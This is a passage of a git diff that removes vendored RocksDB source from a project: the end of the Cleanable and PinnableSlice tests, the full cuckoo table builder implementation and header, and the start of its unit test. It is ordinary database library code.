-  // ~Cleanable
-  ASSERT_EQ(30, res);
-
-  res = 1;
-  {
-    Cleanable c2;
-    c2.RegisterCleanup(Multiplier, &res, &n5);  // res = 5;
-    c2.RegisterCleanup(Multiplier, &res, &n7);  // res = 5 * 7;
-    {
-      Cleanable c1;
-      c1.RegisterCleanup(Multiplier, &res, &n2);  // res = 2;
-      c1.RegisterCleanup(Multiplier, &res, &n3);  // res = 2 * 3;
-      c1.DelegateCleanupsTo(&c2);                 // res = 2 * 3 * 5 * 7;
-    }
-    // ~Cleanable
-    ASSERT_EQ(1, res);
-  }
-  // ~Cleanable
-  ASSERT_EQ(210, res);
-
-  res = 1;
-  {
-    Cleanable c2;
-    c2.RegisterCleanup(Multiplier, &res, &n5);  // res = 5;
-    c2.RegisterCleanup(Multiplier, &res, &n7);  // res = 5 * 7;
-    {
-      Cleanable c1;
-      c1.RegisterCleanup(Multiplier, &res, &n2);  // res = 2;
-      c1.DelegateCleanupsTo(&c2);                 // res = 2 * 5 * 7;
-    }
-    // ~Cleanable
-    ASSERT_EQ(1, res);
-  }
-  // ~Cleanable
-  ASSERT_EQ(70, res);
-
-  res = 1;
-  {
-    Cleanable c2;
-    c2.RegisterCleanup(Multiplier, &res, &n5);  // res = 5;
-    c2.RegisterCleanup(Multiplier, &res, &n7);  // res = 5 * 7;
-    {
-      Cleanable c1;
-      c1.DelegateCleanupsTo(&c2);  // res = 5 * 7;
-    }
-    // ~Cleanable
-    ASSERT_EQ(1, res);
-  }
-  // ~Cleanable
-  ASSERT_EQ(35, res);
-
-  res = 1;
-  {
-    Cleanable c2;
-    c2.RegisterCleanup(Multiplier, &res, &n5);  // res = 5;
-    {
-      Cleanable c1;
-      c1.DelegateCleanupsTo(&c2);  // res = 5;
-    }
-    // ~Cleanable
-    ASSERT_EQ(1, res);
-  }
-  // ~Cleanable
-  ASSERT_EQ(5, res);
-}
-
-static void ReleaseStringHeap(void* s, void*) {
-  delete reinterpret_cast<const std::string*>(s);
-}
-
-class PinnableSlice4Test : public PinnableSlice {
- public:
-  void TestStringIsRegistered(std::string* s) {
-    ASSERT_TRUE(cleanup_.function == ReleaseStringHeap);
-    ASSERT_EQ(cleanup_.arg1, s);
-    ASSERT_EQ(cleanup_.arg2, nullptr);
-    ASSERT_EQ(cleanup_.next, nullptr);
-  }
-};
-
-// Putting the PinnableSlice tests here due to similarity to Cleanable tests
-TEST_F(CleanableTest, PinnableSlice) {
-  int n2 = 2;
-  int res = 1;
-  const std::string const_str = "123";
-
-  {
-    res = 1;
-    PinnableSlice4Test value;
-    Slice slice(const_str);
-    value.PinSlice(slice, Multiplier, &res, &n2);
-    std::string str;
-    str.assign(value.data(), value.size());
-    ASSERT_EQ(const_str, str);
-  }
-  // ~Cleanable
-  ASSERT_EQ(2, res);
-
-  {
-    res = 1;
-    PinnableSlice4Test value;
-    Slice slice(const_str);
-    {
-      Cleanable c1;
-      c1.RegisterCleanup(Multiplier, &res, &n2);  // res = 2;
-      value.PinSlice(slice, &c1);
-    }
-    // ~Cleanable
-    ASSERT_EQ(1, res);  // cleanups must have be delegated to value
-    std::string str;
-    str.assign(value.data(), value.size());
-    ASSERT_EQ(const_str, str);
-  }
-  // ~Cleanable
-  ASSERT_EQ(2, res);
-
-  {
-    PinnableSlice4Test value;
-    Slice slice(const_str);
-    value.PinSelf(slice);
-    std::string str;
-    str.assign(value.data(), value.size());
-    ASSERT_EQ(const_str, str);
-  }
-
-  {
-    PinnableSlice4Test value;
-    std::string* self_str_ptr = value.GetSelf();
-    self_str_ptr->assign(const_str);
-    value.PinSelf();
-    std::string str;
-    str.assign(value.data(), value.size());
-    ASSERT_EQ(const_str, str);
-  }
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/table/cuckoo_table_builder.cc b/thirdparty/rocksdb/table/cuckoo_table_builder.cc
deleted file mode 100644
index e3ed314..0000000
--- a/thirdparty/rocksdb/table/cuckoo_table_builder.cc
+++ /dev/null
@@ -1,515 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-#include "table/cuckoo_table_builder.h"
-
-#include <assert.h>
-#include <algorithm>
-#include <limits>
-#include <string>
-#include <vector>
-
-#include "db/dbformat.h"
-#include "rocksdb/env.h"
-#include "rocksdb/table.h"
-#include "table/block_builder.h"
-#include "table/cuckoo_table_factory.h"
-#include "table/format.h"
-#include "table/meta_blocks.h"
-#include "util/autovector.h"
-#include "util/file_reader_writer.h"
-#include "util/random.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-const std::string CuckooTablePropertyNames::kEmptyKey =
-      "rocksdb.cuckoo.bucket.empty.key";
-const std::string CuckooTablePropertyNames::kNumHashFunc =
-      "rocksdb.cuckoo.hash.num";
-const std::string CuckooTablePropertyNames::kHashTableSize =
-      "rocksdb.cuckoo.hash.size";
-const std::string CuckooTablePropertyNames::kValueLength =
-      "rocksdb.cuckoo.value.length";
-const std::string CuckooTablePropertyNames::kIsLastLevel =
-      "rocksdb.cuckoo.file.islastlevel";
-const std::string CuckooTablePropertyNames::kCuckooBlockSize =
-      "rocksdb.cuckoo.hash.cuckooblocksize";
-const std::string CuckooTablePropertyNames::kIdentityAsFirstHash =
-      "rocksdb.cuckoo.hash.identityfirst";
-const std::string CuckooTablePropertyNames::kUseModuleHash =
-      "rocksdb.cuckoo.hash.usemodule";
-const std::string CuckooTablePropertyNames::kUserKeyLength =
-      "rocksdb.cuckoo.hash.userkeylength";
-
-// Obtained by running echo rocksdb.table.cuckoo | sha1sum
-extern const uint64_t kCuckooTableMagicNumber = 0x926789d0c5f17873ull;
-
-CuckooTableBuilder::CuckooTableBuilder(
-    WritableFileWriter* file, double max_hash_table_ratio,
-    uint32_t max_num_hash_table, uint32_t max_search_depth,
-    const Comparator* user_comparator, uint32_t cuckoo_block_size,
-    bool use_module_hash, bool identity_as_first_hash,
-    uint64_t (*get_slice_hash)(const Slice&, uint32_t, uint64_t),
-    uint32_t column_family_id, const std::string& column_family_name)
-    : num_hash_func_(2),
-      file_(file),
-      max_hash_table_ratio_(max_hash_table_ratio),
-      max_num_hash_func_(max_num_hash_table),
-      max_search_depth_(max_search_depth),
-      cuckoo_block_size_(std::max(1U, cuckoo_block_size)),
-      hash_table_size_(use_module_hash ? 0 : 2),
-      is_last_level_file_(false),
-      has_seen_first_key_(false),
-      has_seen_first_value_(false),
-      key_size_(0),
-      value_size_(0),
-      num_entries_(0),
-      num_values_(0),
-      ucomp_(user_comparator),
-      use_module_hash_(use_module_hash),
-      identity_as_first_hash_(identity_as_first_hash),
-      get_slice_hash_(get_slice_hash),
-      closed_(false) {
-  // Data is in a huge block.
-  properties_.num_data_blocks = 1;
-  properties_.index_size = 0;
-  properties_.filter_size = 0;
-  properties_.column_family_id = column_family_id;
-  properties_.column_family_name = column_family_name;
-}
-
-void CuckooTableBuilder::Add(const Slice& key, const Slice& value) {
-  if (num_entries_ >= kMaxVectorIdx - 1) {
-    status_ = Status::NotSupported("Number of keys in a file must be < 2^32-1");
-    return;
-  }
-  ParsedInternalKey ikey;
-  if (!ParseInternalKey(key, &ikey)) {
-    status_ = Status::Corruption("Unable to parse key into inernal key.");
-    return;
-  }
-  if (ikey.type != kTypeDeletion && ikey.type != kTypeValue) {
-    status_ = Status::NotSupported("Unsupported key type " +
-                                   ToString(ikey.type));
-    return;
-  }
-
-  // Determine if we can ignore the sequence number and value type from
-  // internal keys by looking at sequence number from first key. We assume
-  // that if first key has a zero sequence number, then all the remaining
-  // keys will have zero seq. no.
-  if (!has_seen_first_key_) {
-    is_last_level_file_ = ikey.sequence == 0;
-    has_seen_first_key_ = true;
-    smallest_user_key_.assign(ikey.user_key.data(), ikey.user_key.size());
-    largest_user_key_.assign(ikey.user_key.data(), ikey.user_key.size());
-    key_size_ = is_last_level_file_ ? ikey.user_key.size() : key.size();
-  }
-  if (key_size_ != (is_last_level_file_ ? ikey.user_key.size() : key.size())) {
-    status_ = Status::NotSupported("all keys have to be the same size");
-    return;
-  }
-
-  if (ikey.type == kTypeValue) {
-    if (!has_seen_first_value_) {
-      has_seen_first_value_ = true;
-      value_size_ = value.size();
-    }
-    if (value_size_ != value.size()) {
-      status_ = Status::NotSupported("all values have to be the same size");
-      return;
-    }
-
-    if (is_last_level_file_) {
-      kvs_.append(ikey.user_key.data(), ikey.user_key.size());
-    } else {
-      kvs_.append(key.data(), key.size());
-    }
-    kvs_.append(value.data(), value.size());
-    ++num_values_;
-  } else {
-    if (is_last_level_file_) {
-      deleted_keys_.append(ikey.user_key.data(), ikey.user_key.size());
-    } else {
-      deleted_keys_.append(key.data(), key.size());
-    }
-  }
-  ++num_entries_;
-
-  // In order to fill the empty buckets in the hash table, we identify a
-  // key which is not used so far (unused_user_key). We determine this by
-  // maintaining smallest and largest keys inserted so far in bytewise order
-  // and use them to find a key outside this range in Finish() operation.
-  // Note that this strategy is independent of user comparator used here.
-  if (ikey.user_key.compare(smallest_user_key_) < 0) {
-    smallest_user_key_.assign(ikey.user_key.data(), ikey.user_key.size());
-  } else if (ikey.user_key.compare(largest_user_key_) > 0) {
-    largest_user_key_.assign(ikey.user_key.data(), ikey.user_key.size());
-  }
-  if (!use_module_hash_) {
-    if (hash_table_size_ < num_entries_ / max_hash_table_ratio_) {
-      hash_table_size_ *= 2;
-    }
-  }
-}
-
-bool CuckooTableBuilder::IsDeletedKey(uint64_t idx) const {
-  assert(closed_);
-  return idx >= num_values_;
-}
-
-Slice CuckooTableBuilder::GetKey(uint64_t idx) const {
-  assert(closed_);
-  if (IsDeletedKey(idx)) {
-    return Slice(&deleted_keys_[(idx - num_values_) * key_size_], key_size_);
-  }
-  return Slice(&kvs_[idx * (key_size_ + value_size_)], key_size_);
-}
-
-Slice CuckooTableBuilder::GetUserKey(uint64_t idx) const {
-  assert(closed_);
-  return is_last_level_file_ ? GetKey(idx) : ExtractUserKey(GetKey(idx));
-}
-
-Slice CuckooTableBuilder::GetValue(uint64_t idx) const {
-  assert(closed_);
-  if (IsDeletedKey(idx)) {
-    static std::string empty_value(value_size_, 'a');
-    return Slice(empty_value);
-  }
-  return Slice(&kvs_[idx * (key_size_ + value_size_) + key_size_], value_size_);
-}
-
-Status CuckooTableBuilder::MakeHashTable(std::vector<CuckooBucket>* buckets) {
-  buckets->resize(hash_table_size_ + cuckoo_block_size_ - 1);
-  uint32_t make_space_for_key_call_id = 0;
-  for (uint32_t vector_idx = 0; vector_idx < num_entries_; vector_idx++) {
-    uint64_t bucket_id;
-    bool bucket_found = false;
-    autovector<uint64_t> hash_vals;
-    Slice user_key = GetUserKey(vector_idx);
-    for (uint32_t hash_cnt = 0; hash_cnt < num_hash_func_ && !bucket_found;
-        ++hash_cnt) {
-      uint64_t hash_val = CuckooHash(user_key, hash_cnt, use_module_hash_,
-          hash_table_size_, identity_as_first_hash_, get_slice_hash_);
-      // If there is a collision, check next cuckoo_block_size_ locations for
-      // empty locations. While checking, if we reach end of the hash table,
-      // stop searching and proceed for next hash function.
-      for (uint32_t block_idx = 0; block_idx < cuckoo_block_size_;
-          ++block_idx, ++hash_val) {
-        if ((*buckets)[hash_val].vector_idx == kMaxVectorIdx) {
-          bucket_id = hash_val;
-          bucket_found = true;
-          break;
-        } else {
-          if (ucomp_->Compare(user_key,
-                GetUserKey((*buckets)[hash_val].vector_idx)) == 0) {
-            return Status::NotSupported("Same key is being inserted again.");
-          }
-          hash_vals.push_back(hash_val);
-        }
-      }
-    }
-    while (!bucket_found && !MakeSpaceForKey(hash_vals,
-          ++make_space_for_key_call_id, buckets, &bucket_id)) {
-      // Rehash by increashing number of hash tables.
-      if (num_hash_func_ >= max_num_hash_func_) {
-        return Status::NotSupported("Too many collisions. Unable to hash.");
-      }
-      // We don't really need to rehash the entire table because old hashes are
-      // still valid and we only increased the number of hash functions.
-      uint64_t hash_val = CuckooHash(user_key, num_hash_func_, use_module_hash_,
-          hash_table_size_, identity_as_first_hash_, get_slice_hash_);
-      ++num_hash_func_;
-      for (uint32_t block_idx = 0; block_idx < cuckoo_block_size_;
-          ++block_idx, ++hash_val) {
-        if ((*buckets)[hash_val].vector_idx == kMaxVectorIdx) {
-          bucket_found = true;
-          bucket_id = hash_val;
-          break;
-        } else {
-          hash_vals.push_back(hash_val);
-        }
-      }
-    }
-    (*buckets)[bucket_id].vector_idx = vector_idx;
-  }
-  return Status::OK();
-}
-
-Status CuckooTableBuilder::Finish() {
-  assert(!closed_);
-  closed_ = true;
-  std::vector<CuckooBucket> buckets;
-  Status s;
-  std::string unused_bucket;
-  if (num_entries_ > 0) {
-    // Calculate the real hash size if module hash is enabled.
-    if (use_module_hash_) {
-      hash_table_size_ =
-        static_cast<uint64_t>(num_entries_ / max_hash_table_ratio_);
-    }
-    s = MakeHashTable(&buckets);
-    if (!s.ok()) {
-      return s;
-    }
-    // Determine unused_user_key to fill empty buckets.
-    std::string unused_user_key = smallest_user_key_;
-    int curr_pos = static_cast<int>(unused_user_key.size()) - 1;
-    while (curr_pos >= 0) {
-      --unused_user_key[curr_pos];
-      if (Slice(unused_user_key).compare(smallest_user_key_) < 0) {
-        break;
-      }
-      --curr_pos;
-    }
-    if (curr_pos < 0) {
-      // Try using the largest key to identify an unused key.
-      unused_user_key = largest_user_key_;
-      curr_pos = static_cast<int>(unused_user_key.size()) - 1;
-      while (curr_pos >= 0) {
-        ++unused_user_key[curr_pos];
-        if (Slice(unused_user_key).compare(largest_user_key_) > 0) {
-          break;
-        }
-        --curr_pos;
-      }
-    }
-    if (curr_pos < 0) {
-      return Status::Corruption("Unable to find unused key");
-    }
-    if (is_last_level_file_) {
-      unused_bucket = unused_user_key;
-    } else {
-      ParsedInternalKey ikey(unused_user_key, 0, kTypeValue);
-      AppendInternalKey(&unused_bucket, ikey);
-    }
-  }
-  properties_.num_entries = num_entries_;
-  properties_.fixed_key_len = key_size_;
-  properties_.user_collected_properties[
-        CuckooTablePropertyNames::kValueLength].assign(
-        reinterpret_cast<const char*>(&value_size_), sizeof(value_size_));
-
-  uint64_t bucket_size = key_size_ + value_size_;
-  unused_bucket.resize(bucket_size, 'a');
-  // Write the table.
-  uint32_t num_added = 0;
-  for (auto& bucket : buckets) {
-    if (bucket.vector_idx == kMaxVectorIdx) {
-      s = file_->Append(Slice(unused_bucket));
-    } else {
-      ++num_added;
-      s = file_->Append(GetKey(bucket.vector_idx));
-      if (s.ok()) {
-        if (value_size_ > 0) {
-          s = file_->Append(GetValue(bucket.vector_idx));
-        }
-      }
-    }
-    if (!s.ok()) {
-      return s;
-    }
-  }
-  assert(num_added == NumEntries());
-  properties_.raw_key_size = num_added * properties_.fixed_key_len;
-  properties_.raw_value_size = num_added * value_size_;
-
-  uint64_t offset = buckets.size() * bucket_size;
-  properties_.data_size = offset;
-  unused_bucket.resize(properties_.fixed_key_len);
-  properties_.user_collected_properties[
-    CuckooTablePropertyNames::kEmptyKey] = unused_bucket;
-  properties_.user_collected_properties[
-    CuckooTablePropertyNames::kNumHashFunc].assign(
-        reinterpret_cast<char*>(&num_hash_func_), sizeof(num_hash_func_));
-
-  properties_.user_collected_properties[
-    CuckooTablePropertyNames::kHashTableSize].assign(
-        reinterpret_cast<const char*>(&hash_table_size_),
-        sizeof(hash_table_size_));
-  properties_.user_collected_properties[
-    CuckooTablePropertyNames::kIsLastLevel].assign(
-        reinterpret_cast<const char*>(&is_last_level_file_),
-        sizeof(is_last_level_file_));
-  properties_.user_collected_properties[
-    CuckooTablePropertyNames::kCuckooBlockSize].assign(
-        reinterpret_cast<const char*>(&cuckoo_block_size_),
-        sizeof(cuckoo_block_size_));
-  properties_.user_collected_properties[
-    CuckooTablePropertyNames::kIdentityAsFirstHash].assign(
-        reinterpret_cast<const char*>(&identity_as_first_hash_),
-        sizeof(identity_as_first_hash_));
-  properties_.user_collected_properties[
-    CuckooTablePropertyNames::kUseModuleHash].assign(
-        reinterpret_cast<const char*>(&use_module_hash_),
-        sizeof(use_module_hash_));
-  uint32_t user_key_len = static_cast<uint32_t>(smallest_user_key_.size());
-  properties_.user_collected_properties[
-    CuckooTablePropertyNames::kUserKeyLength].assign(
-        reinterpret_cast<const char*>(&user_key_len),
-        sizeof(user_key_len));
-
-  // Write meta blocks.
-  MetaIndexBuilder meta_index_builder;
-  PropertyBlockBuilder property_block_builder;
-
-  property_block_builder.AddTableProperty(properties_);
-  property_block_builder.Add(properties_.user_collected_properties);
-  Slice property_block = property_block_builder.Finish();
-  BlockHandle property_block_handle;
-  property_block_handle.set_offset(offset);
-  property_block_handle.set_size(property_block.size());
-  s = file_->Append(property_block);
-  offset += property_block.size();
-  if (!s.ok()) {
-    return s;
-  }
-
-  meta_index_builder.Add(kPropertiesBlock, property_block_handle);
-  Slice meta_index_block = meta_index_builder.Finish();
-
-  BlockHandle meta_index_block_handle;
-  meta_index_block_handle.set_offset(offset);
-  meta_index_block_handle.set_size(meta_index_block.size());
-  s = file_->Append(meta_index_block);
-  if (!s.ok()) {
-    return s;
-  }
-
-  Footer footer(kCuckooTableMagicNumber, 1);
-  footer.set_metaindex_handle(meta_index_block_handle);
-  footer.set_index_handle(BlockHandle::NullBlockHandle());
-  std::string footer_encoding;
-  footer.EncodeTo(&footer_encoding);
-  s = file_->Append(footer_encoding);
-  return s;
-}
-
-void CuckooTableBuilder::Abandon() {
-  assert(!closed_);
-  closed_ = true;
-}
-
-uint64_t CuckooTableBuilder::NumEntries() const {
-  return num_entries_;
-}
-
-uint64_t CuckooTableBuilder::FileSize() const {
-  if (closed_) {
-    return file_->GetFileSize();
-  } else if (num_entries_ == 0) {
-    return 0;
-  }
-
-  if (use_module_hash_) {
-    return static_cast<uint64_t>((key_size_ + value_size_) *
-        num_entries_ / max_hash_table_ratio_);
-  } else {
-    // Account for buckets being a power of two.
-    // As elements are added, file size remains constant for a while and
-    // doubles its size. Since compaction algorithm stops adding elements
-    // only after it exceeds the file limit, we account for the extra element
-    // being added here.
-    uint64_t expected_hash_table_size = hash_table_size_;
-    if (expected_hash_table_size < (num_entries_ + 1) / max_hash_table_ratio_) {
-      expected_hash_table_size *= 2;
-    }
-    return (key_size_ + value_size_) * expected_hash_table_size - 1;
-  }
-}
-
-// This method is invoked when there is no place to insert the target key.
-// It searches for a set of elements that can be moved to accommodate target
-// key. The search is a BFS graph traversal with first level (hash_vals)
-// being all the buckets target key could go to.
-// Then, from each node (curr_node), we find all the buckets that curr_node
-// could go to. They form the children of curr_node in the tree.
-// We continue the traversal until we find an empty bucket, in which case, we
-// move all elements along the path from first level to this empty bucket, to
-// make space for target key which is inserted at first level (*bucket_id).
-// If tree depth exceedes max depth, we return false indicating failure.
-bool CuckooTableBuilder::MakeSpaceForKey(
-    const autovector<uint64_t>& hash_vals,
-    const uint32_t make_space_for_key_call_id,
-    std::vector<CuckooBucket>* buckets, uint64_t* bucket_id) {
-  struct CuckooNode {
-    uint64_t bucket_id;
-    uint32_t depth;
-    uint32_t parent_pos;
-    CuckooNode(uint64_t _bucket_id, uint32_t _depth, int _parent_pos)
-        : bucket_id(_bucket_id), depth(_depth), parent_pos(_parent_pos) {}
-  };
-  // This is BFS search tree that is stored simply as a vector.
-  // Each node stores the index of parent node in the vector.
-  std::vector<CuckooNode> tree;
-  // We want to identify already visited buckets in the current method call so
-  // that we don't add same buckets again for exploration in the tree.
-  // We do this by maintaining a count of current method call in
-  // make_space_for_key_call_id, which acts as a unique id for this invocation
-  // of the method. We store this number into the nodes that we explore in
-  // current method call.
-  // It is unlikely for the increment operation to overflow because the maximum
-  // no. of times this will be called is <= max_num_hash_func_ + num_entries_.
-  for (uint32_t hash_cnt = 0; hash_cnt < num_hash_func_; ++hash_cnt) {
-    uint64_t bid = hash_vals[hash_cnt];
-    (*buckets)[bid].make_space_for_key_call_id = make_space_for_key_call_id;
-    tree.push_back(CuckooNode(bid, 0, 0));
-  }
-  bool null_found = false;
-  uint32_t curr_pos = 0;
-  while (!null_found && curr_pos < tree.size()) {
-    CuckooNode& curr_node = tree[curr_pos];
-    uint32_t curr_depth = curr_node.depth;
-    if (curr_depth >= max_search_depth_) {
-      break;
-    }
-    CuckooBucket& curr_bucket = (*buckets)[curr_node.bucket_id];
-    for (uint32_t hash_cnt = 0;
-        hash_cnt < num_hash_func_ && !null_found; ++hash_cnt) {
-      uint64_t child_bucket_id = CuckooHash(GetUserKey(curr_bucket.vector_idx),
-          hash_cnt, use_module_hash_, hash_table_size_, identity_as_first_hash_,
-          get_slice_hash_);
-      // Iterate inside Cuckoo Block.
-      for (uint32_t block_idx = 0; block_idx < cuckoo_block_size_;
-          ++block_idx, ++child_bucket_id) {
-        if ((*buckets)[child_bucket_id].make_space_for_key_call_id ==
-            make_space_for_key_call_id) {
-          continue;
-        }
-        (*buckets)[child_bucket_id].make_space_for_key_call_id =
-          make_space_for_key_call_id;
-        tree.push_back(CuckooNode(child_bucket_id, curr_depth + 1,
-              curr_pos));
-        if ((*buckets)[child_bucket_id].vector_idx == kMaxVectorIdx) {
-          null_found = true;
-          break;
-        }
-      }
-    }
-    ++curr_pos;
-  }
-
-  if (null_found) {
-    // There is an empty node in tree.back(). Now, traverse the path from this
-    // empty node to top of the tree and at every node in the path, replace
-    // child with the parent. Stop when first level is reached in the tree
-    // (happens when 0 <= bucket_to_replace_pos < num_hash_func_) and return
-    // this location in first level for target key to be inserted.
-    uint32_t bucket_to_replace_pos = static_cast<uint32_t>(tree.size()) - 1;
-    while (bucket_to_replace_pos >= num_hash_func_) {
-      CuckooNode& curr_node = tree[bucket_to_replace_pos];
-      (*buckets)[curr_node.bucket_id] =
-        (*buckets)[tree[curr_node.parent_pos].bucket_id];
-      bucket_to_replace_pos = curr_node.parent_pos;
-    }
-    *bucket_id = tree[bucket_to_replace_pos].bucket_id;
-  }
-  return null_found;
-}
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/table/cuckoo_table_builder.h b/thirdparty/rocksdb/table/cuckoo_table_builder.h
deleted file mode 100644
index 3829541..0000000
--- a/thirdparty/rocksdb/table/cuckoo_table_builder.h
+++ /dev/null
@@ -1,127 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-#include <stdint.h>
-#include <limits>
-#include <string>
-#include <utility>
-#include <vector>
-#include "port/port.h"
-#include "rocksdb/status.h"
-#include "table/table_builder.h"
-#include "rocksdb/table.h"
-#include "rocksdb/table_properties.h"
-#include "util/autovector.h"
-
-namespace rocksdb {
-
-class CuckooTableBuilder: public TableBuilder {
- public:
-  CuckooTableBuilder(WritableFileWriter* file, double max_hash_table_ratio,
-                     uint32_t max_num_hash_func, uint32_t max_search_depth,
-                     const Comparator* user_comparator,
-                     uint32_t cuckoo_block_size, bool use_module_hash,
-                     bool identity_as_first_hash,
-                     uint64_t (*get_slice_hash)(const Slice&, uint32_t,
-                                                uint64_t),
-                     uint32_t column_family_id,
-                     const std::string& column_family_name);
-
-  // REQUIRES: Either Finish() or Abandon() has been called.
-  ~CuckooTableBuilder() {}
-
-  // Add key,value to the table being constructed.
-  // REQUIRES: key is after any previously added key according to comparator.
-  // REQUIRES: Finish(), Abandon() have not been called
-  void Add(const Slice& key, const Slice& value) override;
-
-  // Return non-ok iff some error has been detected.
-  Status status() const override { return status_; }
-
-  // Finish building the table.  Stops using the file passed to the
-  // constructor after this function returns.
-  // REQUIRES: Finish(), Abandon() have not been called
-  Status Finish() override;
-
-  // Indicate that the contents of this builder should be abandoned.  Stops
-  // using the file passed to the constructor after this function returns.
-  // If the caller is not going to call Finish(), it must call Abandon()
-  // before destroying this builder.
-  // REQUIRES: Finish(), Abandon() have not been called
-  void Abandon() override;
-
-  // Number of calls to Add() so far.
-  uint64_t NumEntries() const override;
-
-  // Size of the file generated so far.  If invoked after a successful
-  // Finish() call, returns the size of the final generated file.
-  uint64_t FileSize() const override;
-
-  TableProperties GetTableProperties() const override { return properties_; }
-
- private:
-  struct CuckooBucket {
-    CuckooBucket()
-      : vector_idx(kMaxVectorIdx), make_space_for_key_call_id(0) {}
-    uint32_t vector_idx;
-    // This number will not exceed kvs_.size() + max_num_hash_func_.
-    // We assume number of items is <= 2^32.
-    uint32_t make_space_for_key_call_id;
-  };
-  static const uint32_t kMaxVectorIdx = port::kMaxInt32;
-
-  bool MakeSpaceForKey(const autovector<uint64_t>& hash_vals,
-                       const uint32_t call_id,
-                       std::vector<CuckooBucket>* buckets, uint64_t* bucket_id);
-  Status MakeHashTable(std::vector<CuckooBucket>* buckets);
-
-  inline bool IsDeletedKey(uint64_t idx) const;
-  inline Slice GetKey(uint64_t idx) const;
-  inline Slice GetUserKey(uint64_t idx) const;
-  inline Slice GetValue(uint64_t idx) const;
-
-  uint32_t num_hash_func_;
-  WritableFileWriter* file_;
-  const double max_hash_table_ratio_;
-  const uint32_t max_num_hash_func_;
-  const uint32_t max_search_depth_;
-  const uint32_t cuckoo_block_size_;
-  uint64_t hash_table_size_;
-  bool is_last_level_file_;
-  bool has_seen_first_key_;
-  bool has_seen_first_value_;
-  uint64_t key_size_;
-  uint64_t value_size_;
-  // A list of fixed-size key-value pairs concatenating into a string.
-  // Use GetKey(), GetUserKey(), and GetValue() to retrieve a specific
-  // key / value given an index
-  std::string kvs_;
-  std::string deleted_keys_;
-  // Number of key-value pairs stored in kvs_ + number of deleted keys
-  uint64_t num_entries_;
-  // Number of keys that contain value (non-deletion op)
-  uint64_t num_values_;
-  Status status_;
-  TableProperties properties_;
-  const Comparator* ucomp_;
-  bool use_module_hash_;
-  bool identity_as_first_hash_;
-  uint64_t (*get_slice_hash_)(const Slice& s, uint32_t index,
-    uint64_t max_num_buckets);
-  std::string largest_user_key_ = "";
-  std::string smallest_user_key_ = "";
-
-  bool closed_;  // Either Finish() or Abandon() has been called.
-
-  // No copying allowed
-  CuckooTableBuilder(const CuckooTableBuilder&) = delete;
-  void operator=(const CuckooTableBuilder&) = delete;
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/table/cuckoo_table_builder_test.cc b/thirdparty/rocksdb/table/cuckoo_table_builder_test.cc
deleted file mode 100644
index 93daaca..0000000
--- a/thirdparty/rocksdb/table/cuckoo_table_builder_test.cc
+++ /dev/null
@@ -1,632 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include <vector>
-#include <string>
-#include <map>
-#include <utility>
-
-#include "table/meta_blocks.h"
-#include "table/cuckoo_table_builder.h"
-#include "util/file_reader_writer.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-extern const uint64_t kCuckooTableMagicNumber;
-
-namespace {
-std::unordered_map<std::string, std::vector<uint64_t>> hash_map;
-
-uint64_t GetSliceHash(const Slice& s, uint32_t index,
-    uint64_t max_num_buckets) {
-  return hash_map[s.ToString()][index];
-}
-}  // namespace
-
-class CuckooBuilderTest : public testing::Test {
- public:
-  CuckooBuilderTest() {
-    env_ = Env::Default();
-    Options options;
-    options.allow_mmap_reads = true;
-    env_options_ = EnvOptions(options);
-  }
-
-  void CheckFileContents(const std::vector<std::string>& keys,
-      const std::vector<std::string>& values,
-      const std::vector<uint64_t>& expected_locations,
-      std::string expected_unused_bucket, uint64_t expected_table_size,
-      uint32_t expected_num_hash_func, bool expected_is_last_level,
-      uint32_t expected_cuckoo_block_size = 1) {
-    // Read file
-    unique_ptr<RandomAccessFile> read_file;
-    ASSERT_OK(env_->NewRandomAccessFile(fname, &read_file, env_options_));
-    uint64_t read_file_size;
-    ASSERT_OK(env_->GetFileSize(fname, &read_file_size));
-
-	  Options options;
-	  options.allow_mmap_reads = true;
-	  ImmutableCFOptions ioptions(options);
-
-    // Assert Table Properties.
-    TableProperties* props = nullptr;
-    unique_ptr<RandomAccessFileReader> file_reader(
-        new RandomAccessFileReader(std::move(read_file), fname));
-    ASSERT_OK(ReadTableProperties(file_reader.get(), read_file_size,
-                                  kCuckooTableMagicNumber, ioptions,
-                                  &props));
-    // Check unused bucket.
-    std::string unused_key = props->user_collected_properties[
-      CuckooTablePropertyNames::kEmptyKey];
-    ASSERT_EQ(expected_unused_bucket.substr(0,
-          props->fixed_key_len), unused_key);
-
-    uint64_t value_len_found =
-      *reinterpret_cast<const uint64_t*>(props->user_collected_properties[
-                CuckooTablePropertyNames::kValueLength].data());
-    ASSERT_EQ(values.empty() ? 0 : values[0].size(), value_len_found);
-    ASSERT_EQ(props->raw_value_size, values.size()*value_len_found);
-    const uint64_t table_size =
-      *reinterpret_cast<const uint64_t*>(props->user_collected_properties[
-                CuckooTablePropertyNames::kHashTableSize].data());
-    ASSERT_EQ(expected_table_size, table_size);
-    const uint32_t num_hash_func_found =
-      *reinterpret_cast<const uint32_t*>(props->user_collected_properties[
-                CuckooTablePropertyNames::kNumHashFunc].data());
-    ASSERT_EQ(expected_num_hash_func, num_hash_func_found);
-    const uint32_t cuckoo_block_size =
-      *reinterpret_cast<const uint32_t*>(props->user_collected_properties[
-                CuckooTablePropertyNames::kCuckooBlockSize].data());
